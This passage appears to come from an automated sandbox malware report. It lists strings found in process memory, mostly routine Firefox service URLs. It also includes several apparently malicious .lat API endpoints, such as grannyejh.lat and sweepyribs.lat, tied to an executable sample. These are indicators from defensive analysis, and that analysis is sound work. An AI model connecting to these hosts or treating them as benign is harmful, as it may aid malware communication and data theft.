Source: 1c8dd6ecf9.exe, 0000000A.00000002.3187229462.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000A.00000003.3178194377.0000000001118000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat/apiY
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3850555176.0000000001129000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat/apib
Source: 1c8dd6ecf9.exe, 00000008.00000003.3052260787.00000000015D8000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 00000008.00000002.3053845864.00000000015DC000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 00000008.00000003.3052435278.00000000015DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat/apicQ~
Source: 1c8dd6ecf9.exe, 0000000E.00000003.4509662544.00000000010B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat/apier
Source: 1c8dd6ecf9.exe, 0000000E.00000003.4414559391.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.4509086892.00000000010D5000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.4245929411.00000000010DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat/apigs%
Source: 1c8dd6ecf9.exe, 0000000E.00000003.4027046530.00000000010D4000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.4074254154.00000000010DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat/apigsr
Source: 1c8dd6ecf9.exe, 0000000A.00000002.3187229462.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000A.00000003.3178194377.0000000001118000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat/apiup
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3455389539.00000000010B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat/apiupi
Source: 1c8dd6ecf9.exe, 0000000E.00000003.4415308381.0000000001106000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat/j
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3850555176.0000000001111000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.3893613500.0000000001111000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat/x
Source: 1c8dd6ecf9.exe, 00000008.00000003.3052260787.00000000015C3000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000A.00000002.3187229462.00000000010E9000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000A.00000003.3178194377.00000000010E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat:443/api
Source: 1c8dd6ecf9.exe, 0000000A.00000002.3187229462.00000000010E9000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000A.00000003.3178194377.00000000010E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat:443/apihV
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 0000001C.00000002.3328507756.000001F4B6811000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://ideas.mozilla.org/
Source: firefox.exe, 0000001C.00000002.3399651010.000001F4CEB03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://img-getpocket.cdn.mozilla.net/X
Source: firefox.exe, 0000001C.00000002.3344466497.000001F4C3C55000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 0000001C.00000003.3313748699.000001F4C9F18000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3350103609.000001F4C62D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 0000001C.00000002.3395867553.000001F4CE951000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3242565379.000001F4CE951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submits
Source: firefox.exe, 0000001C.00000002.3400899676.000001F4CEC03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://install.mozilla.org
Source: firefox.exe, 0000001C.00000003.3244944098.000001F4C8867000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3302656872.000001F4CEFDC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3241460415.000001F4CEFE3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3376470000.000001F4C8867000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://json-schema.org/draft/2019-09/schema
Source: firefox.exe, 0000001C.00000002.3400899676.000001F4CEC03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lit.dev/docs/libraries/standalone-templates/#rendering-lit-html-templates
Source: firefox.exe, 0000001C.00000002.3400899676.000001F4CEC03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lit.dev/docs/templates/directives/#stylemap
Source: firefox.exe, 0000001C.00000002.3400899676.000001F4CEC03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lit.dev/docs/templates/expressions/#child-expressions)
Source: firefox.exe, 0000001C.00000002.3366625964.000001F4C716A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com
Source: firefox.exe, 0000001C.00000002.3371334522.000001F4C7828000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 0000001C.00000002.3371334522.000001F4C783E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3372504928.000001F4C8503000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 0000001C.00000002.3395867553.000001F4CE913000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3412664948.000016C1A2200000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3325687566.000001C5C2A00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: firefox.exe, 0000001C.00000002.3325687566.000001C5C2A00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.comZ
Source: firefox.exe, 0000001C.00000002.3395867553.000001F4CE913000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%sPdfJs.init
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.inbox.lv/compose?to=%s_injectDefaultProtocolHandlersIfNeededhttps://poczta.interia.pl/m
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%sresource://gre/modules/XPCOMUtils.sys.mjs
Source: firefox.exe, 0000001C.00000002.3328507756.000001F4B68D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 0000001C.00000002.3342111899.000001F4C3100000.00000002.00000001.00040000.0000001C.sdmp	String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest5
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: firefox.exe, 0000001C.00000002.3350103609.000001F4C621F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/about
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/breach-details/
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: firefox.exe, 0000001C.00000002.3342111899.000001F4C3100000.00000002.00000001.00040000.0000001C.sdmp	String found in binary or memory: https://mozilla.org/W
Source: firefox.exe, 0000001C.00000002.3342111899.000001F4C3100000.00000002.00000001.00040000.0000001C.sdmp	String found in binary or memory: https://mzl.la/3NS9KJd
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: firefox.exe, 0000001C.00000003.3244021428.000001F4C8BD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ok.ru/
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%sFailed
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 0000001C.00000002.3342111899.000001F4C3100000.00000002.00000001.00040000.0000001C.sdmp, firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://profiler.firefox.com
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://profiler.firefox.comregisterModulesProtocolHandlertoggleProfilerKeyShortcutsprofilerRecordin
Source: firefox.exe, 0000001C.00000003.3242565379.000001F4CE966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://relay.firefox.com/api/v1/
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/diagnostic?site=
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 0000001C.00000002.3328507756.000001F4B686B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=118.0&pver=2.2&
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&p
Source: firefox.exe, 0000001C.00000002.3352798382.000001F4C669E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=118.0&pver=2.2
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
Source: firefox.exe, 0000001C.00000002.3390666009.000001F4CA863000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=AIzaSyC7jsptDS
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3390666009.000001F4CA863000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3340270619.000001F4C2EA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSy
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 0000001C.00000002.3350103609.000001F4C621F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 0000001C.00000003.3140571050.000001F4C6600000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com/Web
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/abuse/report/addon/
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 0000001C.00000002.3352798382.000001F4C669E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=118.0&pver=2.2
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2EAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3340270619.000001F4C2EA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 0000001C.00000002.3366625964.000001F4C710D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 0000001C.00000002.3366625964.000001F4C716A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
Source: firefox.exe, 0000001C.00000003.3242027640.000001F4CEBC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com
Source: firefox.exe, 0000001C.00000002.3400687379.000001F4CEBE8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3350103609.000001F4C62D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3242565379.000001F4CE951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 0000001C.00000002.3352472754.000001F4C652B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3399651010.000001F4CEB9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 0000001C.00000002.3399651010.000001F4CEB03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/spocs#
Source: firefox.exe, 0000001C.00000002.3399651010.000001F4CEB03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/spocs#l
Source: firefox.exe, 0000001C.00000002.3395867553.000001F4CE951000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3350103609.000001F4C62D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3242565379.000001F4CE951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 0000001C.00000002.3376026938.000001F4C8803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3376613883.000001F4C8931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: firefox.exe, 0000001C.00000002.3350103609.000001F4C621F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-user-removal
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: firefox.exe, 0000001C.00000002.3382631506.000001F4C8E4D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=panel-def
Source: firefox.exe, 0000001C.00000002.3357051773.000001F4C6A60000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=spotlight
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2EAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3738663916.0000000005C3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 0000001C.00000002.3342111899.000001F4C3100000.00000002.00000001.00040000.0000001C.sdmp	String found in binary or memory: https://support.mozilla.org/kb/firefox-crashes-troubleshoot-prevent-and-get-help
Source: firefox.exe, 0000001C.00000002.3348433206.000001F4C4360000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsThe
Source: firefox.exe, 0000001C.00000002.3348433206.000001F4C4360000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsUse
Source: firefox.exe, 0000001C.00000002.3382631506.000001F4C8E19000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3248600780.000001F4C8E32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
Source: firefox.exe, 0000001C.00000002.3384980497.000001F4C9C03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings2
Source: firefox.exe, 0000001C.00000002.3342111899.000001F4C3100000.00000002.00000001.00040000.0000001C.sdmp	String found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causes
Source: firefox.exe, 0000001C.00000002.3342111899.000001F4C3100000.00000002.00000001.00040000.0000001C.sdmp	String found in binary or memory: https://support.mozilla.org/kb/website-translation
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3738663916.0000000005C3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: 6523f73121.exe, 00000009.00000003.3546158475.000000000B91D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: 1c8dd6ecf9.exe, 0000000A.00000002.3187229462.00000000010E9000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000A.00000003.3178194377.00000000010E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sweepyribs.lat:443/api
Source: 1c8dd6ecf9.exe, 00000008.00000002.3053740065.00000000015C3000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 00000008.00000003.3052260787.00000000015C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sweepyribs.lat:443/apiay
Source: firefox.exe, 0000001C.00000002.3400899676.000001F4CEC03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tc39.github.io/ecma262/#sec-typeof-operator
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
Source: firefox.exe, 0000001C.00000002.3348433206.000001F4C4360000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
Source: firefox.exe, 0000001C.00000002.3348433206.000001F4C4360000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
